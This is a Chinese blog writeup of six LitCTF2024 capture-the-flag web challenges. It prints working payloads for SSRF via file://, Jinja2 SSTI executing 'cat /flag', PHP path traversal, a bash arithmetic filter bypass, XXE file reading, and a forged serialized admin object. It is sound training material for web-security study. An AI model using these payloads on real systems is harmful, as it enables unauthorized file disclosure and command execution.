LitCTF2024 Web (NSS刷题记录)

原创 于 2025-02-17 21:35:05 发布 · 1k 阅读 · 16 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#前端
该文章已生成可运行项目,

LitCTF2024 (NSS)

1.浏览器也能套娃?

请添加图片描述

一进去是让输入URL,反复输入题目的URL就是多层套娃

尝试输入其他网站

请添加图片描述

发现百度是可以的,那么这种通过url地址分享网页内容功能处,应该是SSRF

则有SSRF利用:

url?url=http://内网的资源url

本题可以使用file伪协议(即尝试从文件系统中获取文件)

url=file:///flag

请添加图片描述

2.一个…池子?

__class__   :返回类型所属的对象
__mro__     :返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__   :返回该对象所继承的父类
__subclasses__(): 获取当前类的所有子类
__init__  类的初始化方法
__globals__  对包含(保存)函数全局变量的字典的引用

请添加图片描述

看了下是Flask和Nginx,Flask是目前python主流的一个web微框架,通过Flask框架我们可以利用python语言搭建起web服务

Flask默认使用的引擎为jinjia2

而在JINJIA2引擎中:

{{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。
{% ... %}:装载一个控制语句。
{# ... #}:装载一个注释,模板渲染的时候会忽视这中间的值

又根据提示是SSTI,就随便塞了一段进去:{{''.__class__.__bases__[0].__subclasses__()}}

请添加图片描述

然后ctrl + F搜索os._wrap_close,根据定位到137

{{''.__class__.__bases__[0].__subclasses__()[137].__init__.__globals__}}

看看有没有popen函数

发现有,则payload:

{{''.__class__.__base__.__subclasses__()[137].__init__.__globals__['popen']("cat /flag").read()}}

请添加图片描述

3.高亮主题(划掉)背景查看器

源码如下:

<?php

// 文件包含漏洞演示

if (isset($_GET['url'])) {

    // 读取并包含用户输入的文件

    $file = $_GET['url'];

    if (strpos($file, '..') === false) {

        include $file;

    } else {

        echo "Access denied.";

    }

} else {

    echo "No file specified.";

}

?>

但是按照代码上传却什么也没显示

请添加图片描述

回到原页面,发现切换主题会有变动,于是尝试抓包切换页面的过程

请添加图片描述

发现有个POST传参

将theme2.php改为/flag.php发现报错

就改成了…/…/…/…/flag

就行了()

请添加图片描述

4.百万美元的诱惑

<?php
error_reporting(0);

$a = $_GET['a'];
$b = $_GET['b'];

$c = $_GET['c'];

if ($a !== $b && md5($a) == md5($b)) {
        if (!is_numeric($c) && $c > 2024) {
            echo "好康的";
        } else {
            die("干巴爹干巴爹先辈~");
        }
    }
else {
    die("开胃小菜))");
}

源码让我们传个a,b,c

请添加图片描述

<?php
//flag in 12.php
error_reporting(0);
if(isset($_GET['x'])){
    $x = $_GET['x'];
    if(!preg_match("/[a-z0-9;`|#'\"%&\x09\x0a><.,?*\-=\\[\]]/i", $x)){
            system("cat ".$x.".php");
    }
}else{
    highlight_file(__FILE__);
}
?>

dollar.php告诉我们flag在12.php里,但是过滤了数字,那么…

构造一个12 √

/dollar.php?x=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

可得

5.exx

请添加图片描述

先简单输入了一下,发现并没有什么回显,于是抓包了一下

请添加图片描述

再查看源码:

function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

看到了DOMDocument::loadXML字样,再看题目,推测是XXEXML(可拓展标记语言)外部实体注入】

XXE注入的最明显特征包括:

  1. 数据泄露:允许攻击者读取服务器上的敏感文件。
  2. 服务器端请求伪造(SSRF):使攻击者能够发起服务器端的请求,访问内网服务。
  3. 拒绝服务(DoS):通过外部实体消耗服务器资源,导致服务不可用。

于是payload:(ENTITY实体,通过 & 符号引用,后面有分号)

<!DOCTYPE ANY [
    <!ENTITY XXE SYSTEM "file:///flag">
]>
<user>
    <username>
        &XXE;
    </username>
    <password>
        123
    </password>
</user>

请添加图片描述

补充1:(SYSTEM)

  1. 引用外部文件:
    • SYSTEM 允许 XML 解析器加载并解析外部资源。例如,可以引用一个本地文件(如上例中的 file:///path/to/local/file)或网络资源(如 http://example.com/remote.dtd)。
  2. 数据注入:
    • 在安全漏洞中(如 XXE 攻击),攻击者可以利用 SYSTEM 引用本地敏感文件(如 /etc/passwd/flag),从而泄露服务器上的数据。

补充2:(ANY)

  1. 任意文档类型:
    • ANY 表示文档类型没有特定的限制,可以是任意的文档类型。它通常用于测试或开发环境中,允许 XML 解析器忽略文档类型定义(DTD)的严格限制。
  2. 引入外部实体:
    • 在示例中,<!DOCTYPE ANY> 被用来引入外部实体(如 <!ENTITY XXE SYSTEM "file:///flag">)。这允许在 XML 文档中引用外部资源。

6.SAS - Serializing Authentication

<?php

class User {

    public $username;

    public $password;

    function __construct($username, $password) {

        $this->username = $username;

        $this->password = $password;

    }

    function isValid() { return $this->username === 'admin' && $this->password === 'secure_password'; }

}

?>

一道简单的反序列化题目()

payload:

<?php

class User {

    public $username;

    public $password;

}

$a = new User;
$a -> username = 'admin';
$a -> password = 'secure_password';

echo base64_encode(serialize($a));

?>

请添加图片描述

可得flag

本文章已经生成可运行项目
探姬杯LitCTF2024Web方向)
Zue3r的博客
06-02 1241
探姬杯LitCTF2024Web方向)
NSSCTF web 题记1
rev1ve的博客
09-04 2348
今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。
[LitCTF 2024]高亮主题(划掉)背景查看器
最新发布
2301_80243833的博客
08-10 938
例如,攻击者通过浏览器访问…/etc/passwd(此处较多…/),就可以读取Linux服务器根目下的etc目下的passwd文件的内容。和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。以上结合本题,我们打开HackBar构造传参数据,用较多的 …目穿越是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。由此可见这是一道文件包含题。此外,本题涉及到了目穿越。
NSSCTF靶场题解(6)
5fn
08-06 1314
小白视角写题目的wp。体现题目思考的逻辑和细节,助于培养思考题目的逻辑思维。此外,个人认为刚入门web安全这块可以去NSSCTF靶场上一下LitCTF的题。比较简单~,对入门新手很友好。
WebLitCTF 2024 题解()
uuzeray的博客
07-25 1200
file:///flag直接读本地文件。参考ctfshow web57。访问./dollar.php。以xml形式传数据,打xxe。{{7*7}}测出SSTI。随便找个payload打了。随便试一试,一眼ssrf。目穿越拿到flag。
[LitCTF 2024]浏览器也能套娃?
2301_80243833的博客
08-10 551
SSRF漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。出现了相关的百度网页的页面。通过url地址分享网页内容功能处,由此我们想到了SSRF。
Web】CTFSHOW 常用姿势题记()
uuzeray的博客
02-25 4230
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
NSSCTF web 题记2
rev1ve的博客
09-17 3825
源代码phpif(!|\&|\*|\?else{else{?':?"";if ((!break;break;?"";");?简单分析一下,首先是两个函数,功能分别为正则匹配一些字符;foreach循环检测每个值是否合法。然后就是swtich选择结构。我们思路是可以先看看hint有什么,为了绕过if条件判断,我们可以用%81去绕过,因为%81为不可见字符,escapeshellcmd又可以将不可见字符消除payload。
LitCTF 2024(公开赛道)——WP
ASD830的博客
06-02 3944
Misc涐贪恋和伱、甾―⑺dé毎兮毎秒你说得对,但__盯帧珍珠Everywhere We Go关键,太关键了!女装照流量原铁,启动!舔到最后应有尽有The loveWebexx一个....池子?SAS - Serializing Authentication System浏览器也能套娃?高亮主题(划掉)背景查看器百万美元的诱惑Reverse编码喵Cryptocommon_primes题目只给了一张图片,zesteg秒了,flag:LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5b
CTF_Web长征路细题笔记
Mark的博客
01-06 4686
文件包含一、2018 XCTF FINALS —— babyphp二、 一、2018 XCTF FINALS —— babyphp 0x01信息收集 打开环境可以看到几个关键点,首先便是看到有两个可控变量 1: $_GET[‘function’] 执行函数 2: $_POST[‘name’] 可控制session值内容 其次又看到include($file);存在文件包含,ini_set限定了文件包含目 最后可见call_user_func($func,$_GET)这个函
CTFshow题日记-WEB-爆破
Love&Share
09-03 3585
web21 提示:爆破什么的,都是基操 有一个zip文件,解压是一个爆破字典 Authorization: Basic dG9tY2F0OmFkbWlu ------->输入的用户名/口令以base64的形式传输。认证失败显示401 认证成功为200 将Authorization字段后面的值进行base64 解码,即可获取用户认证信息明文 使用bp的Intruder模块 payload type 选择custom iterator(自定义迭代器) 自定义迭代器可以自定义拼接方式,positio
ctfshow题-web3
m0_52011198的博客
02-22 277
php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。include里面的参数是url,提示了可以利用php://伪协议来进行代码执行。猜测ctf_go_go_go中含有flag,利用cat命令进行查看,得到flag。利用burp进行抓包,在包中写入想要执行对的代码,先使用ls命令查看一下文件。
ctf-web bugku题(1)
农夫果园好好喝的博客
06-19 431
点开一看看得我头晕,这玩意是越蹦越快。 点开F12,flag就安静的躺在这里。 让我输入正确的答案,但是我只能输入一个数字,大概是需要修改源码。 修改为10. 点击验证,flag到手。(referer–来源伪造,x-forwarded–ip伪造,user-agent–用户浏览器,cookie–维持登状态,用户身份识别)这个源码比较简单,就是说我们输入参数,就给flag。 使用hackbar给他参数赋值。 得到flag,就是不知道为什么有两个。和上一个题一样的界面,只不过换成了POST传参。 直
LITCTF2024-6月web方向wp
Perterluck的博客
06-02 1349
这个题目考察XXE注入,这个从题目就可看出来(翻转一下就可),了解一下XXE注入,主要了解XML格式和其中DOCTYPE还有主体ENTITY的定义,重点利用的是外部实体注入攻击,因为服务器会直接将xml传送的内容做引用,这样便可以通过一些伪协议找到flag。dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:注意这个协议使用的前提是服务器的端口可以拿到,这个没啥好方法,除非直接告诉你否则就爆破吧。这个就是一个反序列化,没啥好说的,直接按照要求就可拿到flag。
CTF_WEB(习题)
若比邻的博客
12-15 5825
一、bugku_web_cookie欺骗:https://ctf.bugku.com/challenges/detail/id/87.html 地址栏filename一看为base64,解密为keys.php 尝试index.php加密为base64:aW5kZXgucGhw,读取一下,啥也没有 观察地址栏,将line赋值为1试试,发现是将index.php按行读取了 将index.php读取出来,读读取结果 #cookies欺骗 import requests php=""
CTF(Web方向练习题)(持续更新)
m0_56010012的博客
02-23 6080
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
NSSCTF题笔记web14——[SWPUCTF 2021 新生赛]sql
qq_45692883的博客
01-26 595
粗劣试了一下,比较关键的是过滤了空格和等于。传的参数是wllm在源代码中有提示。第二步构造union语句查询数据库。使用mid函数对内容进行截取即可。然后我们再使用sqlmap跑跑看。空格我们可以用/**/代替。然后只露个头,我们截取一下。可以获取数据得到flag。第一步先确认字段数量。第五步,获取flag。
Web】Ctfshow SSRF题记1
uuzeray的博客
11-19 674
核心代码解读curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取内容curl_close():会话关闭。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值